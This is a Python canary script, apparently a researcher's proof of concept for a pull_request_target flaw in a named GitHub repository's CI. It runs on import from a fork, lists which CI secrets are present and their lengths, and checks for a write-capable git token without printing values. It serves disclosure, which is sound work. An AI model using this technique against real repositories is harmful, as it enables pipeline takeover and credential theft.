"""
Security Research PoC - pull_request_target LOTP vulnerability
Author: Robert Prast
Purpose: Authorized security research - canary to confirm code execution from fork
"""
import os
import sys

def security_canary():
    """Harmless canary that proves attacker-controlled code execution"""
    print("=" * 70)
    print("  SECURITY RESEARCH: pull_request_target LOTP PoC")
    print("  Repository: balancer/multisig-ops")
    print("  Author: Robert Prast (@robertprast)")
    print("=" * 70)
    print()
    print(f"[1] Code execution from fork: CONFIRMED")
    print(f"[2] Working directory: {os.getcwd()}")
    print(f"[3] GITHUB_REPOSITORY: {os.environ.get('GITHUB_REPOSITORY', 'N/A')}")
    print(f"[4] GITHUB_RUN_ID: {os.environ.get('GITHUB_RUN_ID', 'N/A')}")
    print(f"[5] GITHUB_ACTOR: {os.environ.get('GITHUB_ACTOR', 'N/A')}")
    print(f"[6] GITHUB_EVENT_NAME: {os.environ.get('GITHUB_EVENT_NAME', 'N/A')}")
    print()

    # Check which secrets are available (print SET/NOT SET only - no values)
    secrets_to_check = [
        "GITHUB_TOKEN", "DRPC_KEY", "ETHERSCAN_TOKEN", "ARBISCAN_TOKEN",
        "GNOSISSCAN_TOKEN", "POLYGONSCAN_TOKEN", "OPTIMISMSCAN_TOKEN",
        "TENDERLY_ACCESS_KEY", "TENDERLY_ACCOUNT_NAME", "TENDERLY_PROJECT_NAME",
        "SNOWTRACE_TOKEN", "SNOWSCAN_TOKEN", "BASESCAN_TOKEN"
    ]
    print("[7] Secret availability (values NOT printed):")
    for secret in secrets_to_check:
        val = os.environ.get(secret)
        status = "SET" if val else "NOT SET"
        if val:
            status += f" (len={len(val)})"
        print(f"    {secret}: {status}")
    print()

    # Check git auth header (proof of write access potential)
    import subprocess
    result = subprocess.run(
        ["git", "config", "--get", "http.https://github.com/.extraheader"],
        capture_output=True, text=True
    )
    if result.stdout.strip():
        print("[8] Git GITHUB_TOKEN auth header: PRESENT (write access possible)")
    else:
        print("[8] Git GITHUB_TOKEN auth header: NOT FOUND")

    print()
    print("=" * 70)
    print("  VULNERABILITY CONFIRMED - Attacker code executed with secrets")
    print("=" * 70)

    # Write canary result to file for the PR comment step
    with open("validate_bip_results.txt", "w") as f:
        f.write("## Security Research - LOTP PoC\n\n")
        f.write("This comment was generated by attacker-controlled code from a fork PR.\n")
        f.write(f"Run ID: {os.environ.get('GITHUB_RUN_ID', 'N/A')}\n")
        f.write(f"Actor: {os.environ.get('GITHUB_ACTOR', 'N/A')}\n")

    # Exit before brownie tries to do anything
    sys.exit(0)

# Run canary immediately on import (brownie runs this as a script)
security_canary()
